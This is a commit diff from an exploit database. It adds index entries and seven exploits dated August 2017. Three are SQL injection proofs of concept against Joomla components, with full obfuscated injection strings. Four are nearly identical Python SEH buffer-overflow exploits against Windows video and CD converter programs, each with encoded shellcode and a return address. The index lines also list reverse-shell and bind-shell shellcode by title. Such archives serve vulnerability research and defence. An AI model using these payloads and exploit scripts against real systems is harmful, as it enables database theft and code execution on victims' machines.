DB: 2017-08-26

7 new exploits

MP3 WAV to CD Burner 1.4.24 - Buffer Overflow (SEH)

My Video Converter 1.5.24 - Buffer Overflow (SEH)

Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Buffer Overflow (SEH)

Easy AVI DivX Converter 1.2.24 - Buffer Overflow (SEH)

Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)

Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)

Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)

Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)
Joomla! Component Bargain Product VM3 1.0 - 'product_id' Parameter SQL Injection
Joomla! Component Price Alert 3.0.2 - 'product_id' Parameter SQL Injection
Joomla! Component MasterForms 1.0.3 - SQL Injection
This commit is contained in:
Offensive Security 2017-08-26 05:01:24 +00:00
parent d4775ec75b
commit c388cc7a95
8 changed files with 343 additions and 4 deletions

View file

@ -8918,6 +8918,7 @@ id,file,description,date,author,platform,type,port
39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
42551,platforms/windows/local/42551.py,"MP3 WAV to CD Burner 1.4.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local,0
39902,platforms/windows/local/39902.txt,"League of Legends Screensaver - Unquoted Service Path Privilege Escalation",2016-06-07,"Vincent Yiu",windows,local,0
@ -8952,6 +8953,7 @@ id,file,description,date,author,platform,type,port
40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",windows,local,0
40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0
40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0
42550,platforms/windows/local/42550.py,"My Video Converter 1.5.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation",2013-08-22,"Tavis Ormandy",linux,local,0
40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
@ -9140,6 +9142,7 @@ id,file,description,date,author,platform,type,port
41873,platforms/osx/local/41873.sh,"GNS3 Mac OS-X 1.5.2 - 'ubridge' Privilege Escalation",2017-04-13,"Hacker Fantastic",osx,local,0
41875,platforms/linux/local/41875.py,"PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation",2017-04-02,"Hacker Fantastic",linux,local,0
41878,platforms/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Privilege Escalation",2017-04-13,hyp3rlinx,windows,local,0
42548,platforms/windows/local/42548.py,"Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
41901,platforms/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
41902,platforms/windows/local/41902.txt,"Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
41904,platforms/multiple/local/41904.txt,"Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local,0
@ -9195,6 +9198,7 @@ id,file,description,date,author,platform,type,port
42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
42549,platforms/windows/local/42549.py,"Easy AVI DivX Converter 1.2.24 - Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local,0
42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
@ -16101,7 +16105,7 @@ id,file,description,date,author,platform,type,port
13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0
13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0
13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0
13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13675,platforms/lin_x86/shellcode/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0
@ -16319,7 +16323,7 @@ id,file,description,date,author,platform,type,port
39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
@ -16399,12 +16403,12 @@ id,file,description,date,author,platform,type,port
41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0
42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
@ -36915,6 +36919,9 @@ id,file,description,date,author,platform,type,port
39145,platforms/cgi/webapps/39145.txt,"Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0
39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0
39150,platforms/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0
42552,platforms/php/webapps/42552.txt,"Joomla! Component Bargain Product VM3 1.0 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
42553,platforms/php/webapps/42553.txt,"Joomla! Component Price Alert 3.0.2 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
42554,platforms/php/webapps/42554.txt,"Joomla! Component MasterForms 1.0.3 - SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
39153,platforms/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0
39156,platforms/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0

Can't render this file because it is too large.

28
platforms/php/webapps/42552.txt Executable file
View file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail
# Demo: http://www.weborange.eu/demo/index.php/bargain-product
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL]
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL]
#
# 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31
#
# Etc..
# # # # #

27
platforms/php/webapps/42553.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Joomla! Component Price Alert 3.0.2 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/price-alert/
# Demo: https://www.weborange.eu/extensions/index.php/extensions-vm3/price-alert-detail
# Version: 3.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL]
#
# 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #

27
platforms/php/webapps/42554.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Joomla! Component MasterForms 1.0.3 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://masterformsbuilder.com/
# Software Link: https://www.joomlamasterforms.com/download?file=masterforms_v.1.0.3_j3.3.zip
# Demo: https://demo.masterformsbuilder.com/
# Version: 1.0.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_masterforms&layout=form&formid=[SQL]
#
# 1'+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+-
#
# Etc..
# # # # #

View file

@ -0,0 +1,59 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: Easy Video to iPod/MP4/PSP/3GP Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.5.20
# Software Link: http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()

View file

@ -0,0 +1,59 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy AVI DivX Converter 1.2.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: Easy AVI DivX Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.2.24
# Software Link: http://www.divxtodvd.net/easy_avi_converter.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()

View file

@ -0,0 +1,59 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: My Video Converter 1.5.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: My Video Converter 1.5.24
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.5.24
# Software Link: http://www.divxtodvd.net/my_video_converter.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()

View file

@ -0,0 +1,73 @@
#!/usr/bin/python
###############################################################################
# Exploit Title: MP3 WAV to CD Burner 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: MP3 WAV to CD Burner
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.4.24
# Software Link: http://www.divxtodvd.net/mp3_cd_burner.exe
# Tested On: Windows 7 x64
# All the vendor's softwares below are affected to this bug which all can be found in http://www.divxtodvd.net/ till date 24-08-2017 .
# Easy MPEG/AVI/DIVX/WMV/RM to DVD
# Easy Avi/Divx/Xvid to DVD Burner
# Easy MPEG to DVD Burner
# Easy WMV/ASF/ASX to DVD Burner
# Easy RM RMVB to DVD Burner
# Easy CD DVD Copy
# MP3/AVI/MPEG/WMV/RM to Audio CD Burner
# MP3/WAV/OGG/WMA/AC3 to CD Burner
# Easy MOV Converter
# Easy Video to iPod Converter
# Easy Video to PSP Converter
# Easy Video to 3GP Converter
# Easy Video to MP4 Converter
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()